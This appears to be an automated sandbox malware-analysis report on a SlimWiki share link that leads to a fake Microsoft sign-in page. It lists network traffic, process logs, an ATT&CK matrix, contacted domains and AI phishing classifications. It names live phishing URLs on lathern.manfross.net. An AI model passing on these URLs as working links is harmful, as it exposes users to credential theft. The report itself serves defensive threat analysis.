          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56552
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.18:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.23.209.185:443 -> 192.168.2.18:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:49850 version: TLS 1.2
          Source: classification engineClassification label: mal68.phis.win@22/99@52/326
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1952,i,15982323657434710459,10639272288985908440,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1952,i,15982323657434710459,10639272288985908440,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Scripting
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Registry Run Keys / Startup Folder
          1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Extra Window Memory Injection
          1
          Deobfuscate/Decode Files or Information
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Extra Window Memory Injection
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a40%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            lathern.manfross.net
            104.21.2.150
            truetrue
              unknown
              github.com
              140.82.121.3
              truefalse
                unknown
                oozou-prod-slimwiki-alb-1409086241.us-east-1.elb.amazonaws.com
                107.20.97.240
                truefalse
                  unknown
                  code.jquery.com
                  151.101.130.137
                  truefalse
                    unknown
                    d2vgu95hoyrpkh.cloudfront.net
                    18.245.31.33
                    truefalse
                      unknown
                      cdnjs.cloudflare.com
                      104.17.24.14
                      truefalse
                        unknown
                        d3blkimb060pwm.cloudfront.net
                        3.161.82.24
                        truefalse
                          unknown
                          challenges.cloudflare.com
                          104.17.2.184
                          truefalse
                            unknown
                            qqe.p9j32.com
                            172.67.182.147
                            truefalse
                              unknown
                              www.google.com
                              142.250.186.68
                              truefalse
                                unknown
                                d19d360lklgih4.cloudfront.net
                                13.33.187.14
                                truefalse
                                  unknown
                                  objects.githubusercontent.com
                                  185.199.109.133
                                  truefalse
                                    unknown
                                    o432630.ingest.sentry.io
                                    34.120.195.249
                                    truefalse
                                      unknown
                                      api.beta.slimwiki.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        cdn.socket.io
                                        unknown
                                        unknownfalse
                                          unknown
                                          beta.slimwiki.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            ok4static.oktacdn.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgtrue
                                                unknown
                                                https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4false
                                                  unknown
                                                  https://lathern.manfross.net/rFfYEQ/true
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/i4p05/0x4AAAAAAAdpZlKc4sQ-fsbY/auto/normaltrue
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.186.68
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      104.21.2.150
                                                      lathern.manfross.netUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      142.250.185.99
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      13.226.175.15
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      13.33.187.14
                                                      d19d360lklgih4.cloudfront.netUnited States
                                                      16509AMAZON-02USfalse
                                                      172.217.23.106
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      18.245.31.33
                                                      d2vgu95hoyrpkh.cloudfront.netUnited States
                                                      16509AMAZON-02USfalse
                                                      142.250.185.104
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      151.101.130.137
                                                      code.jquery.comUnited States
                                                      54113FASTLYUSfalse
                                                      104.17.3.184
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      107.20.97.240
                                                      oozou-prod-slimwiki-alb-1409086241.us-east-1.elb.amazonaws.comUnited States
                                                      14618AMAZON-AESUSfalse
                                                      18.239.36.82
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      185.199.109.133
                                                      objects.githubusercontent.comNetherlands
                                                      54113FASTLYUSfalse
                                                      35.190.80.1
                                                      a.nel.cloudflare.comUnited States
                                                      15169GOOGLEUSfalse
                                                      172.67.129.84
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      142.250.184.195
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      104.17.24.14
                                                      cdnjs.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      142.250.185.67
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      1.1.1.1
                                                      unknownAustralia
                                                      13335CLOUDFLARENETUSfalse
                                                      34.104.35.123
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      172.67.182.147
                                                      qqe.p9j32.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      172.217.16.206
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      65.9.86.73
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      172.217.18.4
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      74.125.71.84
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      140.82.121.3
                                                      github.comUnited States
                                                      36459GITHUBUSfalse
                                                      3.161.82.26
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      3.161.82.24
                                                      d3blkimb060pwm.cloudfront.netUnited States
                                                      16509AMAZON-02USfalse
                                                      216.58.206.46
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      104.17.2.184
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      34.120.195.249
                                                      o432630.ingest.sentry.ioUnited States
                                                      15169GOOGLEUSfalse
                                                      IP
                                                      192.168.2.17
                                                      192.168.2.18
                                                      192.168.2.6
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1466175
                                                      Start date and time:2024-07-02 16:34:37 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                      Sample URL:https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:15
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      Analysis Mode:stream
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal68.phis.win@22/99@52/326
                                                      • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 152.199.19.161, 142.250.184.195, 74.125.71.84, 172.217.16.206, 142.250.185.104, 34.104.35.123
                                                      • Excluded domains from analysis (whitelisted): cdp-f-tlu-net.trafficmanager.net, wildcardtlu.azureedge.net, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, www.googletagmanager.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, clientservices.googleapis.com, clients.l.google.com, wildcardtlu.ec.azureedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, cs9.wpc.v0cdn.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • VT rate limit hit for: https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4
                                                      InputOutput
                                                      URL: https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4 Model: Perplexity: mixtral-8x7b-instruct
                                                      {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a 'Sign In' and 'Sign Up' button, which are common elements of a login form.","The title of the webpage includes 'SlimWiki', which is a platform known for creating wikis, a type of webpage that often requires user authentication."]}{"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain any text that creates a sense of urgency.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism.","The title and text of the webpage do not provide enough information to determine if it contains a login form."]}
                                                      Title: SlimWiki OCR: slimwiki Sign In Sign Up Powered by SlimWiki 
                                                      URL: https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4 Model: Perplexity: mixtral-8x7b-instruct
                                                      {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form as there is no explicit request for sensitive information such as passwords, email addresses, usernames, phone numbers or credit card numbers (CVV).","The text does not create a sense of urgency as it does not contain phrases such as 'Click here to view document', 'To view secured document click here', or 'Open the link to see your invoice'.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
                                                      Title: Accurate Safety Compliance | SlimWiki OCR: slimwiki Sign Up Sign In Ria cole Accurate Safety Compliance PDF Brandy King a partag le document [Accurate Safety Compliance] avec vous VIEW FILE Brandy King Accurate Safety Compliance Powered by SlimWlki 
                                                      URL: https://beta.slimwiki.com Model: gpt-4o
                                                      ```json{  "phishing_score": 1,  "brands": "SlimWiki",  "phishing": false,  "suspicious_domain": false,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": false,  "has_suspicious_link": false,  "legitmate_domain": "slimwiki.com",  "reasons": "The URL 'https://beta.slimwiki.com' appears to be a subdomain of 'slimwiki.com', which is a legitimate domain. The page has a prominent login form, but this is common for many legitimate sites. There are no obvious social engineering techniques or suspicious links present. The branding matches the known brand 'SlimWiki'. Therefore, there is no strong evidence to suggest that this is a phishing site."}
                                                      URL: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqg Model: Perplexity: mixtral-8x7b-instruct
                                                      {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency or interest as it is a standard sign-in page without any limited-time offers or incentives."]}
                                                      Title: Equity Valuation OCR: Microsoft Sign in Email, phone, or Skype No account? Create one! Can't access your account? Next Sign-in options Terms of use Privacy & cookies 
                                                      URL: https://lathern.manfross.net Model: gpt-4o
                                                      ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://lathern.manfross.net' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The webpage closely resembles the legitimate Microsoft login page, which is a common social engineering technique used in phishing attacks. The presence of a prominent login form without a CAPTCHA further adds to the suspicion. Given these factors, it is highly likely that this is a phishing site."}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 13:35:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2675
                                                      Entropy (8bit):3.972260681020435
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3971BD320F9A0F918CBA49100742B663
                                                      SHA1:648EC589C3F4F2FA2E5CB438A2227847A848E868
                                                      SHA-256:A33C64EB9D5CF96480792A5A7C6913047D2F00792E8BA406F3E07EA72C78517E
                                                      SHA-512:843EB11EFC3A370B7A00EA7D46BE338DC3838FF7AD39647F76B89ADBFC92511F8ACB3DA5B461E1EC60E22FEDD8D4C257B6BADCAB9E319E70E59498FD7432A8E3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,.....7..........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.XZt....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xdt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Xdt....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Xdt...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xft.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Zp.1.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 13:35:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2677
                                                      Entropy (8bit):3.987377284120372
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:AB4E2532201A0827A7C9D3268F8368F9
                                                      SHA1:31B457005D6A37B9D82B8CFAF4260C3E22CCAA19
                                                      SHA-256:8ECC799A447611E0587CCA5CCAAA147A20D82C35F44B6D95AE540A9197D94686
                                                      SHA-512:781AAC08EA6365BE00CCA93D67B6450DC230107DBA70803E56A9CADFF41FB978EC9FB41793B8EA6CD3D9614673702E994250B906520ABE27559704DD04A71ABC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,....::..........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.XZt....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xdt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Xdt....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Xdt...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xft.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Zp.1.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
